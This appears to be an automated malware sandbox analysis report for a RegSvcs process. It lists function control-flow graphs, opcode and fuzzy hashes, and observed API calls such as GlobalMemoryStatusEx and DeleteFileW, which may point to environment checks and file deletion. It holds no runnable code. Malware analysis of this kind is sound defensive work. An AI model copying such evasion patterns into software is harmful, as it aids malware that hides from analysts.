                                                            control_flow_graph 526 5dd5658-5dd5675 527 5dd5677-5dd567a 526->527 528 5dd568d-5dd5690 527->528 529 5dd567c-5dd5682 527->529 532 5dd56a1-5dd56a4 528->532 533 5dd5692-5dd5696 528->533 530 5dd5688 529->530 531 5dd5741-5dd574b 529->531 530->528 540 5dd5752-5dd5754 531->540 536 5dd56a6-5dd56ad 532->536 537 5dd56b2-5dd56b5 532->537 534 5dd581d-5dd582a 533->534 535 5dd569c 533->535 535->532 536->537 538 5dd56b7-5dd56cd 537->538 539 5dd56d2-5dd56d5 537->539 538->539 541 5dd56df-5dd56e2 539->541 542 5dd56d7-5dd56da 539->542 543 5dd5759-5dd575c 540->543 547 5dd56e4-5dd56f1 541->547 548 5dd56f6-5dd56f9 541->548 542->541 544 5dd575e-5dd576d 543->544 545 5dd5772-5dd5775 543->545 544->545 545->529 551 5dd577b-5dd577e 545->551 547->548 549 5dd570c-5dd570f 548->549 550 5dd56fb-5dd5701 548->550 556 5dd571b-5dd571e 549->556 557 5dd5711-5dd571a 549->557 554 5dd5707 550->554 555 5dd57b6-5dd57bc 550->555 558 5dd5788-5dd578b 551->558 559 5dd5780-5dd5783 551->559 554->549 563 5dd57be-5dd57c6 555->563 564 5dd582b-5dd585b 555->564 556->550 560 5dd5720-5dd5723 556->560 561 5dd578d-5dd57ac 558->561 562 5dd57b1-5dd57b4 558->562 559->558 565 5dd573c-5dd573f 560->565 566 5dd5725-5dd5737 560->566 561->562 562->555 567 5dd57e0-5dd57e3 562->567 563->564 568 5dd57c8-5dd57d5 563->568 577 5dd5865-5dd5868 564->577 565->531 565->543 566->565 570 5dd57eb-5dd57ee 567->570 571 5dd57e5-5dd57e6 567->571 568->564 569 5dd57d7-5dd57db 568->569 569->567 574 5dd5801-5dd5804 570->574 575 5dd57f0-5dd57f6 570->575 571->570 579 5dd580b-5dd580d 574->579 580 5dd5806-5dd5808 574->580 575->542 578 5dd57fc 575->578 582 5dd588a-5dd588d 577->582 583 5dd586a-5dd586e 577->583 578->574 584 5dd580f 579->584 585 5dd5814-5dd5817 579->585 580->579 588 5dd588f-5dd58a0 582->588 589 5dd58a5-5dd58a8 582->589 586 5dd5874-5dd587c 583->586 587 5dd5952-5dd598c 583->587 584->585 585->527 585->534 586->587 590 5dd5882-5dd5885 586->590 600 5dd598e-5dd5991 587->600 588->589 591 5dd58ca-5dd58cd 589->591 592 5dd58aa-5dd58ae 589->592 590->582 596 5dd58dd-5dd58e0 591->596 597 5dd58cf-5dd58d6 591->597 592->587 595 5dd58b4-5dd58bc 592->595 595->587 601 5dd58c2-5dd58c5 595->601 598 5dd58fa-5dd58fd 596->598 599 5dd58e2-5dd58e6 596->599 602 5dd58d8 597->602 603 5dd594a-5dd5951 597->603 605 5dd58ff-5dd5903 598->605 606 5dd5917-5dd591a 598->606 599->587 604 5dd58e8-5dd58f0 599->604 607 5dd59af-5dd59b2 600->607 608 5dd5993-5dd59a4 600->608 601->591 602->596 604->587 609 5dd58f2-5dd58f5 604->609 605->587 610 5dd5905-5dd590d 605->610 611 5dd591c-5dd5923 606->611 612 5dd5924-5dd5927 606->612 613 5dd59cc-5dd59cf 607->613 614 5dd59b4-5dd59c5 607->614 623 5dd5a2b-5dd5a32 608->623 624 5dd59aa 608->624 609->598 610->587 615 5dd590f-5dd5912 610->615 617 5dd5929-5dd5933 612->617 618 5dd5938-5dd593a 612->618 619 5dd59e7-5dd59ea 613->619 620 5dd59d1-5dd59e4 613->620 614->623 633 5dd59c7 614->633 615->606 617->618 626 5dd593c 618->626 627 5dd5941-5dd5944 618->627 621 5dd59ec-5dd59f1 619->621 622 5dd59f4-5dd59f7 619->622 621->622 629 5dd59f9-5dd5a00 622->629 630 5dd5a05-5dd5a08 622->630 632 5dd5a37-5dd5a3a 623->632 624->607 626->627 627->577 627->603 629->630 634 5dd5a0a-5dd5a1b 630->634 635 5dd5a26-5dd5a29 630->635 636 5dd5a40-5dd5bd4 632->636 637 5dd5d23-5dd5d26 632->637 633->613 634->608 645 5dd5a21 634->645 635->623 635->632 675 5dd5d0d-5dd5d20 636->675 676 5dd5bda-5dd5be1 636->676 638 5dd5d28-5dd5d39 637->638 639 5dd5d44-5dd5d47 637->639 638->623 650 5dd5d3f 638->650 640 5dd5d49-5dd5d5a 639->640 641 5dd5d65-5dd5d68 639->641 640->620 651 5dd5d60 640->651 641->636 644 5dd5d6e-5dd5d71 641->644 644->636 649 5dd5d77-5dd5d79 644->649 645->635 652 5dd5d7b 649->652 653 5dd5d80-5dd5d83 649->653 650->639 651->641 652->653 653->600 655 5dd5d89-5dd5d92 653->655 677 5dd5c95-5dd5c9c 676->677 678 5dd5be7-5dd5c0a 676->678 677->675 679 5dd5c9e-5dd5cd1 677->679 687 5dd5c12-5dd5c1a 678->687 691 5dd5cd6-5dd5d03 679->691 692 5dd5cd3 679->692 688 5dd5c1c 687->688 689 5dd5c1f-5dd5c60 687->689 688->689 700 5dd5c78-5dd5c89 689->700 701 5dd5c62-5dd5c73 689->701 691->655 692->691 700->655 701->655
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-3993045852
                                                            • Opcode ID: ca1fde8602b367e7a5b8ac3f007b50c8a7a4afb14c4a0dde50950e72fa3cb109
                                                            • Instruction ID: be161689eb8864d440a242d81b04c7d76af443700a13f6d6e2cf48d3455c8362
                                                            • Opcode Fuzzy Hash: ca1fde8602b367e7a5b8ac3f007b50c8a7a4afb14c4a0dde50950e72fa3cb109
                                                            • Instruction Fuzzy Hash: 53228135E002159FDF20DBA8D490AAEFBB2FF85320F24856AD456EB344DA35DC41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD66B0 Relevance: .8, Instructions: 817COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1888581666f29af438a0960f3aa22b44751b76a6be2f962b1ce21b85af8b0aee
                                                            • Instruction ID: e82909d7729ff129fd89f73969848bb999d0412a6d293e2e43572213beaba4ae
                                                            • Opcode Fuzzy Hash: 1888581666f29af438a0960f3aa22b44751b76a6be2f962b1ce21b85af8b0aee
                                                            • Instruction Fuzzy Hash: 4A625C34B002058FDB14DB68D594BADF7B2FB89311F14856AE406EB394EB35ED46CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDC238 Relevance: .6, Instructions: 640COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1402 5ddc238-5ddc258 1403 5ddc25a-5ddc25d 1402->1403 1404 5ddc25f-5ddc268 1403->1404 1405 5ddc273-5ddc276 1403->1405 1406 5ddc26e 1404->1406 1407 5ddc3a2-5ddc3ab 1404->1407 1408 5ddc278-5ddc292 1405->1408 1409 5ddc297-5ddc29a 1405->1409 1406->1405 1410 5ddc5cf-5ddc605 1407->1410 1411 5ddc3b1-5ddc3b8 1407->1411 1408->1409 1412 5ddc29c-5ddc2a1 1409->1412 1413 5ddc2a4-5ddc2a7 1409->1413 1425 5ddc607-5ddc60a 1410->1425 1414 5ddc3bd-5ddc3c0 1411->1414 1412->1413 1416 5ddc2a9-5ddc2ac 1413->1416 1417 5ddc2b1-5ddc2b4 1413->1417 1419 5ddc3ca-5ddc3cd 1414->1419 1420 5ddc3c2-5ddc3c5 1414->1420 1416->1417 1421 5ddc2c6-5ddc2c9 1417->1421 1422 5ddc2b6-5ddc2c1 1417->1422 1426 5ddc3cf-5ddc3f5 1419->1426 1427 5ddc3fa-5ddc3fd 1419->1427 1420->1419 1423 5ddc2cb-5ddc2ce 1421->1423 1424 5ddc2e0-5ddc2e3 1421->1424 1422->1421 1423->1410 1428 5ddc2d4-5ddc2db 1423->1428 1429 5ddc2ef-5ddc2f2 1424->1429 1430 5ddc2e5-5ddc2e8 1424->1430 1431 5ddc60c-5ddc616 1425->1431 1432 5ddc617-5ddc61a 1425->1432 1426->1427 1433 5ddc3ff-5ddc40e 1427->1433 1434 5ddc419-5ddc41c 1427->1434 1428->1424 1439 5ddc2ff-5ddc302 1429->1439 1440 5ddc2f4-5ddc2fa 1429->1440 1430->1423 1438 5ddc2ea 1430->1438 1441 5ddc61c-5ddc62a 1432->1441 1442 5ddc631-5ddc634 1432->1442 1453 5ddc414 1433->1453 1454 5ddc4b1-5ddc4b2 1433->1454 1436 5ddc41e-5ddc443 1434->1436 1437 5ddc448-5ddc44b 1434->1437 1436->1437 1447 5ddc44d-5ddc45f 1437->1447 1448 5ddc464-5ddc467 1437->1448 1438->1429 1445 5ddc32f-5ddc332 1439->1445 1446 5ddc304-5ddc32a 1439->1446 1440->1439 1450 5ddc636-5ddc64f 1441->1450 1462 5ddc62c 1441->1462 1449 5ddc65c-5ddc65f 1442->1449 1442->1450 1451 5ddc394-5ddc397 1445->1451 1452 5ddc334-5ddc38f 1445->1452 1446->1445 1447->1448 1460 5ddc47f-5ddc482 1448->1460 1461 5ddc469-5ddc47a 1448->1461 1455 5ddc67f-5ddc682 1449->1455 1456 5ddc661-5ddc67a 1449->1456 1481 5ddc6b7-5ddc6c3 1450->1481 1493 5ddc651-5ddc65b 1450->1493 1451->1404 1465 5ddc39d-5ddc3a0 1451->1465 1452->1451 1453->1434 1471 5ddc4b7-5ddc4ba 1454->1471 1468 5ddc6a5-5ddc6a7 1455->1468 1469 5ddc684-5ddc6a0 1455->1469 1456->1455 1466 5ddc4ac-5ddc4af 1460->1466 1467 5ddc484-5ddc4a7 1460->1467 1461->1460 1462->1442 1465->1407 1465->1414 1466->1454 1466->1471 1467->1466 1472 5ddc6ae-5ddc6b1 1468->1472 1473 5ddc6a9 1468->1473 1469->1468 1479 5ddc4bc-5ddc4be 1471->1479 1480 5ddc4c1-5ddc4c4 1471->1480 1472->1425 1472->1481 1473->1472 1479->1480 1480->1430 1486 5ddc4ca-5ddc4cd 1480->1486 1489 5ddc6c9-5ddc6d2 1481->1489 1490 5ddc863-5ddc86d 1481->1490 1487 5ddc4cf-5ddc4d5 1486->1487 1488 5ddc4da-5ddc4dd 1486->1488 1487->1488 1495 5ddc4df-5ddc4fb 1488->1495 1496 5ddc500-5ddc503 1488->1496 1497 5ddc86e-5ddc8a6 1489->1497 1498 5ddc6d8-5ddc6f8 1489->1498 1495->1496 1503 5ddc52f-5ddc532 1496->1503 1504 5ddc505-5ddc52a 1496->1504 1516 5ddc8a8-5ddc8ab 1497->1516 1523 5ddc6fe-5ddc707 1498->1523 1524 5ddc851-5ddc85d 1498->1524 1507 5ddc534-5ddc53b 1503->1507 1508 5ddc546-5ddc549 1503->1508 1504->1503 1507->1420 1513 5ddc541 1507->1513 1514 5ddc54b-5ddc565 1508->1514 1515 5ddc56a-5ddc56d 1508->1515 1513->1508 1514->1515 1519 5ddc56f-5ddc589 1515->1519 1520 5ddc58e-5ddc591 1515->1520 1521 5ddca67-5ddca6a 1516->1521 1522 5ddc8b1-5ddc8bf 1516->1522 1519->1520 1528 5ddc593-5ddc5ad 1520->1528 1529 5ddc5b2-5ddc5b4 1520->1529 1530 5ddca8d-5ddca8f 1521->1530 1531 5ddca6c-5ddca88 1521->1531 1536 5ddc8c6-5ddc8c8 1522->1536 1523->1497 1534 5ddc70d-5ddc73c call 5dd6660 1523->1534 1524->1489 1524->1490 1528->1529 1537 5ddc5bb-5ddc5be 1529->1537 1538 5ddc5b6 1529->1538 1532 5ddca96-5ddca99 1530->1532 1533 5ddca91 1530->1533 1531->1530 1532->1516 1540 5ddca9f-5ddcaa8 1532->1540 1533->1532 1559 5ddc77e-5ddc794 1534->1559 1560 5ddc73e-5ddc776 1534->1560 1545 5ddc8df-5ddc909 1536->1545 1546 5ddc8ca-5ddc8cd 1536->1546 1537->1403 1539 5ddc5c4-5ddc5ce 1537->1539 1538->1537 1554 5ddca5c-5ddca66 1545->1554 1555 5ddc90f-5ddc918 1545->1555 1546->1540 1557 5ddc91e-5ddca2d call 5dd6660 1555->1557 1558 5ddca35-5ddca5a 1555->1558 1557->1555 1609 5ddca33 1557->1609 1558->1540 1565 5ddc796-5ddc7aa 1559->1565 1566 5ddc7b2-5ddc7c8 1559->1566 1560->1559 1565->1566 1572 5ddc7ca-5ddc7de 1566->1572 1573 5ddc7e6-5ddc7f9 1566->1573 1572->1573 1581 5ddc7fb-5ddc805 1573->1581 1582 5ddc807 1573->1582 1583 5ddc80c-5ddc80e 1581->1583 1582->1583 1585 5ddc83f-5ddc84b 1583->1585 1586 5ddc810-5ddc815 1583->1586 1585->1523 1585->1524 1587 5ddc817-5ddc821 1586->1587 1588 5ddc823 1586->1588 1590 5ddc828-5ddc82a 1587->1590 1588->1590 1590->1585 1591 5ddc82c-5ddc838 1590->1591 1591->1585 1609->1554
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffc65db980a969e2eaba36edf72ae3b4a2dd02beae38830edd2c592d0b8130c1
                                                            • Instruction ID: af76ade2e288a24eb77f9f9640af93d7692ee634ced1bd5a351c5a887a70b1a3
                                                            • Opcode Fuzzy Hash: ffc65db980a969e2eaba36edf72ae3b4a2dd02beae38830edd2c592d0b8130c1
                                                            • Instruction Fuzzy Hash: F8329234B102059FDB14DB68D894FAEB7B2FB89310F10892AE505E7365DB35EC46CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDB2DF Relevance: .6, Instructions: 567COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f24c405f3f130b65b52f9c37949607fa3b9b689d9e2ca62d25a3a21cf73bccc6
                                                            • Instruction ID: 0d78812f46a52ce83077d1719d6bba3d1459d9f67481264845fba323c6ee4b45
                                                            • Opcode Fuzzy Hash: f24c405f3f130b65b52f9c37949607fa3b9b689d9e2ca62d25a3a21cf73bccc6
                                                            • Instruction Fuzzy Hash: 7B226F34E002099BEF24DA68D490BBDF7B2FB49314F658827E405EB395DA35DC819FA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3520 Relevance: .5, Instructions: 545COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2111 5dd3520-5dd3541 2113 5dd3543-5dd3546 2111->2113 2114 5dd356c-5dd356f 2113->2114 2115 5dd3548-5dd3567 2113->2115 2116 5dd3575-5dd3594 2114->2116 2117 5dd3d10-5dd3d12 2114->2117 2115->2114 2125 5dd35ad-5dd35b7 2116->2125 2126 5dd3596-5dd3599 2116->2126 2118 5dd3d19-5dd3d1c 2117->2118 2119 5dd3d14 2117->2119 2118->2113 2122 5dd3d22-5dd3d2b 2118->2122 2119->2118 2129 5dd35bd-5dd35cc 2125->2129 2126->2125 2127 5dd359b-5dd35ab 2126->2127 2127->2129 2240 5dd35ce call 5dd3d39 2129->2240 2241 5dd35ce call 5dd3d40 2129->2241 2131 5dd35d3-5dd35d8 2132 5dd35da-5dd35e0 2131->2132 2133 5dd35e5-5dd38c2 2131->2133 2132->2122 2154 5dd38c8-5dd3977 2133->2154 2155 5dd3d02-5dd3d0f 2133->2155 2164 5dd3979-5dd399e 2154->2164 2165 5dd39a0 2154->2165 2167 5dd39a9-5dd39bc 2164->2167 2165->2167 2169 5dd3ce9-5dd3cf5 2167->2169 2170 5dd39c2-5dd39e4 call 5dd310c 2167->2170 2169->2154 2171 5dd3cfb 2169->2171 2170->2169 2174 5dd39ea-5dd39f4 2170->2174 2171->2155 2174->2169 2175 5dd39fa-5dd3a05 2174->2175 2175->2169 2176 5dd3a0b-5dd3ae1 2175->2176 2188 5dd3aef-5dd3b1f 2176->2188 2189 5dd3ae3-5dd3ae5 2176->2189 2193 5dd3b2d-5dd3b39 2188->2193 2194 5dd3b21-5dd3b23 2188->2194 2189->2188 2195 5dd3b99-5dd3b9d 2193->2195 2196 5dd3b3b-5dd3b3f 2193->2196 2194->2193 2197 5dd3cda-5dd3ce3 2195->2197 2198 5dd3ba3-5dd3bdf 2195->2198 2196->2195 2199 5dd3b41-5dd3b6b 2196->2199 2197->2169 2197->2176 2210 5dd3bed-5dd3bfb 2198->2210 2211 5dd3be1-5dd3be3 2198->2211 2206 5dd3b6d-5dd3b6f 2199->2206 2207 5dd3b79-5dd3b96 call 5dd3118 2199->2207 2206->2207 2207->2195 2214 5dd3bfd-5dd3c08 2210->2214 2215 5dd3c12-5dd3c1d 2210->2215 2211->2210 2214->2215 2220 5dd3c0a 2214->2220 2218 5dd3c1f-5dd3c25 2215->2218 2219 5dd3c35-5dd3c46 2215->2219 2221 5dd3c29-5dd3c2b 2218->2221 2222 5dd3c27 2218->2222 2224 5dd3c5e-5dd3c6a 2219->2224 2225 5dd3c48-5dd3c4e 2219->2225 2220->2215 2221->2219 2222->2219 2229 5dd3c6c-5dd3c72 2224->2229 2230 5dd3c82-5dd3cd3 2224->2230 2226 5dd3c50 2225->2226 2227 5dd3c52-5dd3c54 2225->2227 2226->2224 2227->2224 2231 5dd3c74 2229->2231 2232 5dd3c76-5dd3c78 2229->2232 2230->2197 2231->2230 2232->2230 2240->2131 2241->2131
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b98b14bd83371a9d8dc2e82fb7fec1c92274235629ddf4df22429babacb51b9
                                                            • Instruction ID: dccb15cd6fbdc9349ebc945c42fca8442b53db0505a350e51e8d06efc82091a2
                                                            • Opcode Fuzzy Hash: 4b98b14bd83371a9d8dc2e82fb7fec1c92274235629ddf4df22429babacb51b9
                                                            • Instruction Fuzzy Hash: 95323131E1075ACFDB14EB75D89099DF7B2FFC9300F609A5AD40AA7214EB30A985CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD7E40 Relevance: .5, Instructions: 472COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2242 5dd7e40-5dd7e5e 2243 5dd7e60-5dd7e63 2242->2243 2244 5dd7e65-5dd7e7f 2243->2244 2245 5dd7e84-5dd7e87 2243->2245 2244->2245 2246 5dd7e9e-5dd7ea1 2245->2246 2247 5dd7e89-5dd7e97 2245->2247 2248 5dd7ec4-5dd7ec7 2246->2248 2249 5dd7ea3-5dd7ebf 2246->2249 2254 5dd7e99 2247->2254 2255 5dd7ee6-5dd7efc 2247->2255 2252 5dd7ec9-5dd7ed3 2248->2252 2253 5dd7ed4-5dd7ed6 2248->2253 2249->2248 2257 5dd7edd-5dd7ee0 2253->2257 2258 5dd7ed8 2253->2258 2254->2246 2262 5dd8117-5dd8121 2255->2262 2263 5dd7f02-5dd7f0b 2255->2263 2257->2243 2257->2255 2258->2257 2264 5dd7f11-5dd7f2e 2263->2264 2265 5dd8122-5dd8157 2263->2265 2272 5dd8104-5dd8111 2264->2272 2273 5dd7f34-5dd7f5c 2264->2273 2268 5dd8159-5dd815c 2265->2268 2270 5dd8391-5dd8394 2268->2270 2271 5dd8162-5dd8171 2268->2271 2274 5dd83b7-5dd83ba 2270->2274 2275 5dd8396-5dd83b2 2270->2275 2283 5dd8190-5dd81d4 2271->2283 2284 5dd8173-5dd818e 2271->2284 2272->2262 2272->2263 2273->2272 2299 5dd7f62-5dd7f6b 2273->2299 2277 5dd8465-5dd8467 2274->2277 2278 5dd83c0-5dd83cc 2274->2278 2275->2274 2279 5dd846e-5dd8471 2277->2279 2280 5dd8469 2277->2280 2285 5dd83d7-5dd83d9 2278->2285 2279->2268 2286 5dd8477-5dd8480 2279->2286 2280->2279 2295 5dd81da-5dd81eb 2283->2295 2296 5dd8365-5dd837b 2283->2296 2284->2283 2287 5dd83db-5dd83e1 2285->2287 2288 5dd83f1-5dd83f5 2285->2288 2293 5dd83e5-5dd83e7 2287->2293 2294 5dd83e3 2287->2294 2297 5dd83f7-5dd8401 2288->2297 2298 5dd8403 2288->2298 2293->2288 2294->2288 2308 5dd81f1-5dd820e 2295->2308 2309 5dd8350-5dd835f 2295->2309 2296->2270 2302 5dd8408-5dd840a 2297->2302 2298->2302 2299->2265 2303 5dd7f71-5dd7f8d 2299->2303 2305 5dd840c-5dd840f 2302->2305 2306 5dd841b-5dd8454 2302->2306 2312 5dd7f93-5dd7fbd 2303->2312 2313 5dd80f2-5dd80fe 2303->2313 2305->2286 2306->2271 2325 5dd845a-5dd8464 2306->2325 2308->2309 2321 5dd8214-5dd830a call 5dd6660 2308->2321 2309->2295 2309->2296 2326 5dd80e8-5dd80ed 2312->2326 2327 5dd7fc3-5dd7feb 2312->2327 2313->2272 2313->2299 2375 5dd830c-5dd8316 2321->2375 2376 5dd8318 2321->2376 2326->2313 2327->2326 2334 5dd7ff1-5dd801f 2327->2334 2334->2326 2339 5dd8025-5dd802e 2334->2339 2339->2326 2340 5dd8034-5dd8066 2339->2340 2348 5dd8068-5dd806c 2340->2348 2349 5dd8071-5dd808d 2340->2349 2348->2326 2351 5dd806e 2348->2351 2349->2313 2352 5dd808f-5dd80e6 call 5dd6660 2349->2352 2351->2349 2352->2313 2377 5dd831d-5dd831f 2375->2377 2376->2377 2377->2309 2378 5dd8321-5dd8326 2377->2378 2379 5dd8328-5dd8332 2378->2379 2380 5dd8334 2378->2380 2381 5dd8339-5dd833b 2379->2381 2380->2381 2381->2309 2382 5dd833d-5dd8349 2381->2382 2382->2309
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b31c2d97b59c75bdbd9478d17c15e26bc88e574aaf8755624f3bf3d8e2d6d5bc
                                                            • Instruction ID: a5fada8a038ee7602d70f1a665099657a97628688c2075967e787a25a585de6d
                                                            • Opcode Fuzzy Hash: b31c2d97b59c75bdbd9478d17c15e26bc88e574aaf8755624f3bf3d8e2d6d5bc
                                                            • Instruction Fuzzy Hash: 89028030B012158FDB15DB68D894BAEB7B2FF85310F24856AE806DB395DB35EC46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0249EE9C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 704 249ee9c-249eeb9 707 249eebb-249eebe 704->707 708 249eebf-249ef4c GlobalMemoryStatusEx 704->708 711 249ef4e-249ef54 708->711 712 249ef55-249ef7d 708->712 711->712
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0249EF3F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2133038011.0000000002490000.00000040.00000800.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2490000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 87717ec2174ad37176216277dfc6f2a18601f086d6f6e94c02cb2360d3dcf0ba
                                                            • Instruction ID: a34e09d15f004226afda22ba2d41146aa7f2228c79065d66228a75a3a18092ee
                                                            • Opcode Fuzzy Hash: 87717ec2174ad37176216277dfc6f2a18601f086d6f6e94c02cb2360d3dcf0ba
                                                            • Instruction Fuzzy Hash: 0C2184B1D0425A9FDB10CFAAD8447AEBBF4AF48310F15856AE908A7340D738A905CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02498071 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 715 2498071-24980c2 717 24980ca-24980f5 DeleteFileW 715->717 718 24980c4-24980c7 715->718 719 24980fe-2498126 717->719 720 24980f7-24980fd 717->720 718->717 720->719
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 024980E8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2133038011.0000000002490000.00000040.00000800.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2490000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 7268293d3c754aff4ff908974e25fa644296fb813998a0735c0e2295fc963ab3
                                                            • Instruction ID: 844df6ec89a056102c945283024f3c75858908f460ed58406f4133d63274c490
                                                            • Opcode Fuzzy Hash: 7268293d3c754aff4ff908974e25fa644296fb813998a0735c0e2295fc963ab3
                                                            • Instruction Fuzzy Hash: 172135B1C0065A9FCB10CFAAD445BEEFBB0EF49720F15825AD818A7241D738A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02498078 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 723 2498078-24980c2 725 24980ca-24980f5 DeleteFileW 723->725 726 24980c4-24980c7 723->726 727 24980fe-2498126 725->727 728 24980f7-24980fd 725->728 726->725 728->727
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 024980E8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2133038011.0000000002490000.00000040.00000800.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2490000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: a479bdf443c6e09fada4a6fd20c54147f0ac67cd6e1ccd77e122d224b6e35cf1
                                                            • Instruction ID: 38cd3410005bab93332899edc7a47ace192c12970e917c8b3448452713a97ef1
                                                            • Opcode Fuzzy Hash: a479bdf443c6e09fada4a6fd20c54147f0ac67cd6e1ccd77e122d224b6e35cf1
                                                            • Instruction Fuzzy Hash: 831124B1C0065ADBCB10CF9AD544B9EFBB4FF49720F11812AD818A7240D738A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0249EED8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 731 249eed8-249ef4c GlobalMemoryStatusEx 733 249ef4e-249ef54 731->733 734 249ef55-249ef7d 731->734 733->734
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0249EF3F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2133038011.0000000002490000.00000040.00000800.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2490000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 24c03b9922ef241d937347882e40d34281f848dcc7250050f86c270e42d05b5a
                                                            • Instruction ID: a03e92fd8ccc93641100d1d40cc8f3dc868455b20b681b02ba300a5943db41ca
                                                            • Opcode Fuzzy Hash: 24c03b9922ef241d937347882e40d34281f848dcc7250050f86c270e42d05b5a
                                                            • Instruction Fuzzy Hash: C41112B1C006599BDB10CFAAC444B9EFBF4AF48720F15816AD918B7240D378A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDCFF8 Relevance: .8, Instructions: 798COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
